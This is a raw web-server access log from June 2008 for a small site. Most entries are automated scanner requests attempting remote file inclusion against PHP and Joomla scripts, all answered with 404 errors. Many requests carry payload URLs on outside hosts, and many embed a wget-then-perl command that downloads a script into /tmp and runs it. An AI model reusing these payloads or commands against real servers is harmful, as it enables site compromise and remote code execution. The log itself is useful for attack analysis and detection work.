213.219.170.56 - - [15/Jun/2008:18:16:45 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
70.85.192.194 - - [15/Jun/2008:18:17:03 -0700] "GET /logs/access.log/errors.php?error=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
70.85.192.194 - - [15/Jun/2008:18:17:03 -0700] "GET /errors.php?error=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
70.85.192.194 - - [15/Jun/2008:18:17:03 -0700] "GET /logs/errors.php?error=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
77.79.246.200 - - [15/Jun/2008:18:17:30 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
62.140.19.133 - - [15/Jun/2008:18:17:30 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.neighborhoodglimpses.com"
77.79.246.200 - - [15/Jun/2008:18:17:30 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
77.79.246.200 - - [15/Jun/2008:18:17:31 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
62.140.19.101 - - [15/Jun/2008:18:17:37 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.neighborhoodglimpses.com"
77.79.246.200 - - [15/Jun/2008:18:17:54 -0700] "GET /logs/access.log/errors.php?error=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
77.79.246.200 - - [15/Jun/2008:18:17:54 -0700] "GET /errors.php?error=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
77.79.246.200 - - [15/Jun/2008:18:17:55 -0700] "GET /logs/errors.php?error=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
67.195.37.175 - - [15/Jun/2008:18:18:08 -0700] "GET /?M=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.neighborhoodglimpses.com"
62.43.197.73 - - [15/Jun/2008:18:20:03 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
62.43.197.73 - - [15/Jun/2008:18:20:07 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
150.165.231.5 - - [15/Jun/2008:18:21:59 -0700] "GET /main.php?x=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
65.46.13.250 - - [15/Jun/2008:18:22:23 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
87.106.61.18 - - [15/Jun/2008:18:22:54 -0700] "GET /logs/access.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
87.106.61.18 - - [15/Jun/2008:18:22:54 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
87.106.6.169 - - [15/Jun/2008:18:22:56 -0700] "GET /logs/access.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
195.28.69.222 - - [15/Jun/2008:18:22:56 -0700] "GET /logs/access.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
87.106.6.169 - - [15/Jun/2008:18:22:56 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
195.28.69.222 - - [15/Jun/2008:18:22:56 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
81.75.227.51 - - [15/Jun/2008:18:23:36 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
85.236.53.164 - - [15/Jun/2008:18:24:49 -0700] "GET /logs/access.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
85.236.53.164 - - [15/Jun/2008:18:24:49 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
77.79.246.200 - - [15/Jun/2008:18:25:15 -0700] "GET /logs/errors.php?error=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
77.79.246.200 - - [15/Jun/2008:18:25:15 -0700] "GET /errors.php?error=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
66.246.129.122 - - [15/Jun/2008:18:25:42 -0700] "GET /logs/access.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
66.246.129.122 - - [15/Jun/2008:18:25:42 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
213.208.134.30 - - [15/Jun/2008:18:25:58 -0700] "GET /logs/access.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
213.208.134.30 - - [15/Jun/2008:18:25:58 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
87.230.27.160 - - [15/Jun/2008:18:26:48 -0700] "GET /logs/access.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
87.230.27.160 - - [15/Jun/2008:18:26:48 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
70.85.192.194 - - [15/Jun/2008:18:27:11 -0700] "GET /logs/errors.php?error=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
70.85.192.194 - - [15/Jun/2008:18:27:11 -0700] "GET /errors.php?error=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
88.198.185.6 - - [15/Jun/2008:18:27:18 -0700] "GET /logs/access.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
88.198.185.6 - - [15/Jun/2008:18:27:18 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
202.221.143.111 - - [15/Jun/2008:18:27:39 -0700] "GET /index.php?go=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
125.245.146.189 - - [15/Jun/2008:18:27:49 -0700] "GET /view.inc.php?phpAds_path=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
85.17.3.183 - - [15/Jun/2008:18:28:43 -0700] "GET /index.php3?pag=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
70.85.192.194 - - [15/Jun/2008:18:28:53 -0700] "GET /logs/access_080128.log//include/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
12.29.165.84 - - [15/Jun/2008:18:29:10 -0700] "GET /logs/access.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
12.29.165.84 - - [15/Jun/2008:18:29:10 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
202.5.95.201 - - [15/Jun/2008:18:29:31 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
203.30.161.227 - - [15/Jun/2008:18:29:55 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.neighborhoodglimpses.com"
89.111.170.125 - - [15/Jun/2008:18:30:01 -0700] "GET /logs/access.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
89.111.170.125 - - [15/Jun/2008:18:30:01 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
150.165.231.5 - - [15/Jun/2008:18:30:57 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
150.165.231.5 - - [15/Jun/2008:18:30:57 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
64.207.65.26 - - [15/Jun/2008:18:33:19 -0700] "GET /logs/errors.php?error=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
64.207.65.26 - - [15/Jun/2008:18:33:20 -0700] "GET /errors.php?error=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
200.160.96.54 - - [15/Jun/2008:18:33:56 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
200.160.96.54 - - [15/Jun/2008:18:33:56 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
203.172.184.72 - - [15/Jun/2008:18:33:57 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
202.47.247.136 - - [15/Jun/2008:18:33:57 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
65.55.211.138 - - [15/Jun/2008:18:35:05 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.neighborhoodglimpses.com"
65.55.211.138 - - [15/Jun/2008:18:35:05 -0700] "GET /?S=A HTTP/1.1" 200 779 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.neighborhoodglimpses.com"
85.214.115.47 - - [15/Jun/2008:18:35:21 -0700] "GET /logs/access.log/errors.php?error=http://www.iglesialcs.cl/newweb/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
85.214.115.47 - - [15/Jun/2008:18:35:22 -0700] "GET /errors.php?error=http://www.iglesialcs.cl/newweb/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
85.214.115.47 - - [15/Jun/2008:18:35:22 -0700] "GET /logs/errors.php?error=http://www.iglesialcs.cl/newweb/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
202.221.143.111 - - [15/Jun/2008:18:35:23 -0700] "GET /index.php?go=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
70.85.192.194 - - [15/Jun/2008:18:35:52 -0700] "GET /logs/access.log/errors.php?error=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
70.85.192.194 - - [15/Jun/2008:18:35:52 -0700] "GET /errors.php?error=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
70.85.192.194 - - [15/Jun/2008:18:35:52 -0700] "GET /logs/errors.php?error=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
125.245.146.189 - - [15/Jun/2008:18:36:13 -0700] "GET /logs/access.log/view.inc.php?phpAds_path=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
125.245.146.189 - - [15/Jun/2008:18:36:14 -0700] "GET /logs/view.inc.php?phpAds_path=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
200.181.217.196 - - [15/Jun/2008:18:36:59 -0700] "GET /logs/access_080211.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
200.181.217.196 - - [15/Jun/2008:18:37:00 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
200.181.217.196 - - [15/Jun/2008:18:37:01 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
85.214.28.45 - - [15/Jun/2008:18:37:28 -0700] "GET /include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.neighborhoodglimpses.com"
80.86.91.115 - - [15/Jun/2008:18:38:41 -0700] "GET /logs/access.log/errors.php?error=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
80.86.91.115 - - [15/Jun/2008:18:38:41 -0700] "GET /errors.php?error=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
80.86.91.115 - - [15/Jun/2008:18:38:42 -0700] "GET /logs/errors.php?error=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
70.85.192.194 - - [15/Jun/2008:18:39:22 -0700] "GET /logs/errors.php?error=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
70.85.192.194 - - [15/Jun/2008:18:39:22 -0700] "GET /errors.php?error=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
85.214.28.45 - - [15/Jun/2008:18:39:30 -0700] "GET /logs/access.log/include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.neighborhoodglimpses.com"
85.214.28.45 - - [15/Jun/2008:18:39:31 -0700] "GET /include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.neighborhoodglimpses.com"
85.214.28.45 - - [15/Jun/2008:18:39:31 -0700] "GET /logs/include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.neighborhoodglimpses.com"
212.227.85.13 - - [15/Jun/2008:18:39:49 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.neighborhoodglimpses.com"
64.207.65.26 - - [15/Jun/2008:18:40:00 -0700] "GET /logs/access.log/errors.php?error=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
64.207.65.26 - - [15/Jun/2008:18:40:00 -0700] "GET /errors.php?error=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
64.207.65.26 - - [15/Jun/2008:18:40:00 -0700] "GET /logs/errors.php?error=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
65.46.13.250 - - [15/Jun/2008:18:40:01 -0700] "GET /logs/access.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
65.46.13.250 - - [15/Jun/2008:18:40:01 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
207.44.132.63 - - [15/Jun/2008:18:40:24 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/anna.risma/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.neighborhoodglimpses.com"
207.44.132.63 - - [15/Jun/2008:18:40:24 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/anna.risma/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.neighborhoodglimpses.com"
77.79.246.200 - - [15/Jun/2008:18:40:26 -0700] "GET /logs/access_080128.log//include/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
85.214.115.47 - - [15/Jun/2008:18:41:35 -0700] "GET /logs/errors.php?error=http://www.iglesialcs.cl/newweb/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
85.214.115.47 - - [15/Jun/2008:18:41:35 -0700] "GET /errors.php?error=http://www.iglesialcs.cl/newweb/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
85.214.28.45 - - [15/Jun/2008:18:42:04 -0700] "GET /logs/access_071217.log/include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.neighborhoodglimpses.com"
200.181.217.196 - - [15/Jun/2008:18:42:41 -0700] "GET /logs/access_071217.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
200.181.217.196 - - [15/Jun/2008:18:42:42 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
200.181.217.196 - - [15/Jun/2008:18:42:43 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
74.6.17.168 - - [15/Jun/2008:18:43:15 -0700] "GET /logs/access.log HTTP/1.0" 200 48546 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.neighborhoodglimpses.com"
